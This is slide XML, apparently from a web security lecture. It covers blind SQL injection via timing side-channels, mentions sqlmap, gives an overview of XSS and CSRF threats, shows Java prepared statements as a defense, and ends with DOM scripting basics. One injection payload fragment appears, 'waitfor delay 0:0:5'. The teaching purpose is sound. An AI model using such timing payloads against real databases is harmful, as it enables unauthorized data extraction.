            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>65 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> delay ‘0:0:5’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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2328213" y="1370519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3611826" y="3933470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24256" y="292693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476" y="3850500"/>
            <a:ext cx="1485000" cy="11025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097226" y="5337422"/>
            <a:ext cx="5029200" cy="8790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By timing responses, the attacker learns about the database one bit at a time </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376024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Injecting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Approach: ask a series of True/False questions, exploit side-channels.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Time delays or lack-of-error/error are the usual side-channels.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87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http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>sqlmap.org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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can help automate blind injection, determining number of columns, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Abstracts away some database-specific details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“Sometimes” works fully automatically!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7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Security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1052927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(By Threat Model)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719488"/>
            <a:ext cx="1240078" cy="17857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153769"/>
            <a:ext cx="1905372" cy="110909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2819400" y="2422441"/>
            <a:ext cx="800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819400" y="2789006"/>
            <a:ext cx="800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05372" y="2973460"/>
            <a:ext cx="1219200" cy="1219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0" y="45059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Malicious User Attacking Other Users</a:t>
            </a:r>
            <a:endParaRPr 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-1" y="5105400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Cross-Site Scripting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182" y="5532197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Cross-Site Request Forgery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7884" y="5958994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Remote Script Inclusion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565079" y="2150211"/>
            <a:ext cx="1905372" cy="1109097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>
            <a:off x="5410200" y="2325551"/>
            <a:ext cx="800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410200" y="2690819"/>
            <a:ext cx="800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84698" y="3212956"/>
            <a:ext cx="1102102" cy="110210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19182" y="2992249"/>
            <a:ext cx="1102102" cy="110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1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Parameterized Queries with Bound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297" y="1600200"/>
            <a:ext cx="65303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setUpAndExecPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(){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query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err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>conn.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>prepareStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>UPDATE players SET name = ?, score = ?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>,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        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>active = ? WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>jerseyNum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = ?"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)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r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> 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i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>//automatically sanitizes and adds </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>quotes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query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, "Smith, Steve"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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  <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>42)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setBoolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>setInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>99)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0" smtClean="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>returns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>number</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>changed</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>query.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>executeUpdate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" b="1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7160442" y="2667000"/>
            <a:ext cx="1907358" cy="1752600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -154013"/>
              <a:gd name="adj2" fmla="val 18818"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst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Similar methods for other SQL types</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Right Brace 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="3352800"/>
            <a:ext cx="228600" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="righ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Snip and Round Single Corner Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5638623"/>
            <a:ext cx="8229600" cy="990777"/>
          </a:xfrm>
          <a:prstGeom prst="snip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Prepared queries stop us from mixing data with code!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean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76743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Site Scripting (XSS)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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies and Sessions</a:t>
            </a:r>
          </a:p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20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Browser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7543800" cy="47545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Window or frame loads content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Renders content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Parse HTML, scripts, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Run scripts, plugins,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Responds to events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Event examples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>User actions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnMouseover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rendering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnBeforeUnload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Timing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clearTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>()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A05C-7D88-9E4B-B6AC-1CE35ACF5DD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33220" y="1718235"/>
            <a:ext cx="760258" cy="1592861"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 732192 w 760258"/>
              <a:gd name="connsiteY0" fmla="*/ 1538941 h 1592861"/>
              <a:gd name="connsiteX1" fmla="*/ 672427 w 760258"/>
              <a:gd name="connsiteY1" fmla="*/ 1509059 h 1592861"/>
              <a:gd name="connsiteX2" fmla="*/ 74 w 760258"/>
              <a:gd name="connsiteY2" fmla="*/ 747059 h 1592861"/>
              <a:gd name="connsiteX3" fmla="*/ 717251 w 760258"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 159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258" h="1592861">
                <a:moveTo>
                  <a:pt x="732192" y="1538941"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="763319" y="1589990"/>
                  <a:pt x="794447" y="1641039"/>
                  <a:pt x="672427" y="1509059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="550407" y="1377079"/>
                  <a:pt x="-7397" y="998569"/>
                  <a:pt x="74" y="747059"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7545" y="495549"/>
                  <a:pt x="717251" y="0"/>
                  <a:pt x="717251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7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A05C-7D88-9E4B-B6AC-1CE35ACF5DD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22694" y="3796365"/>
            <a:ext cx="18288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141694" y="4594084"/>
            <a:ext cx="9906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56194" y="4594084"/>
            <a:ext cx="9906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 flipH="1">
            <a:off x="4636994" y="4177365"/>
            <a:ext cx="800100" cy="416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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5437095" y="4177364"/>
            <a:ext cx="914399" cy="416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9" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3646394" y="4975084"/>
            <a:ext cx="990600" cy="246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151094" y="5221544"/>
            <a:ext cx="9906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895241" y="5221544"/>
            <a:ext cx="533401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9" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6351494" y="4975084"/>
            <a:ext cx="810448" cy="246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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3379694" y="5602544"/>
            <a:ext cx="266700" cy="44172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2"/>
            <a:endCxn id="41" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7161942" y="5602544"/>
            <a:ext cx="19909" cy="4573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6515102" y="6059893"/>
            <a:ext cx="1333498" cy="3230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61950" y="4177364"/>
            <a:ext cx="2381250" cy="184243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 parse tree that is dynamically updated</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Snip Single Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="826994" y="1447800"/>
            <a:ext cx="7620000" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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rtlCol="0" anchor="t" anchorCtr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&lt;html&gt;&lt;body&gt;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&lt;head&gt;&lt;title&gt;Example&lt;/title&gt; ... &lt;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/head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body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&gt;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&lt;a id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>myid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" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>href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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript:flipText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()"&gt;Alice&lt;/a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&gt;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&lt;/body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&gt;&lt;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/html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&gt;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841390" y="5221544"/>
            <a:ext cx="9906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8" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4636994" y="4975084"/>
            <a:ext cx="699696" cy="246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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5069990" y="5602544"/>
            <a:ext cx="266700" cy="44172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33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ingle Corner Rectangle 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279522" y="1139362"/>
            <a:ext cx="7620000" cy="4904903"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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rtlCol="0" anchor="t" anchorCtr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&lt;head&gt; ...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&lt;script type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript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"&gt;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  flip = 0;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  function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>flipText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() {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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>var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 x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>document.getElementById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('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>myid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').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>firstChild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   if(flip == 0) { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x.nodeValue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 = 'Bob'; flip = 1;}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   else { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>x.nodeValue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 = 'Alice'; flip = 0; }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&lt;/script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/head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body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&gt;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&lt;a id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>myid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" </a:t>
            </a:r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href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="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>javascript:flipText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()"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Alice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/a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&gt;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&lt;/body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A05C-7D88-9E4B-B6AC-1CE35ACF5DD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57800" y="3796365"/>
            <a:ext cx="18288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76800" y="4594084"/>
            <a:ext cx="9906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591300" y="4594084"/>
            <a:ext cx="9906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 flipH="1">
            <a:off x="5372100" y="4177365"/>
            <a:ext cx="800100" cy="416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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6172201" y="4177364"/>
            <a:ext cx="914399" cy="416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630347" y="5221544"/>
            <a:ext cx="533401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9" idx="2"/>
            <a:endCxn id="27" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7086600" y="4975084"/>
            <a:ext cx="810448" cy="246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2"/>
            <a:endCxn id="41" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7897048" y="5602544"/>
            <a:ext cx="19909" cy="462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250208" y="6064790"/>
            <a:ext cx="1333498" cy="3230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576496" y="5221544"/>
            <a:ext cx="9906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8" idx="2"/>
            <a:endCxn id="30" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5372100" y="4975084"/>
            <a:ext cx="699696" cy="246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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5753100" y="5602544"/>
            <a:ext cx="318696" cy="46224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086351" y="6064790"/>
            <a:ext cx="1333498" cy="3230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flipText</a:t>
            </a:r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1600200" y="5791200"/>
            <a:ext cx="2514600" cy="645714"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 87990"/>
              <a:gd name="adj2" fmla="val 20094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Edits “Alice” to be “Bob”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
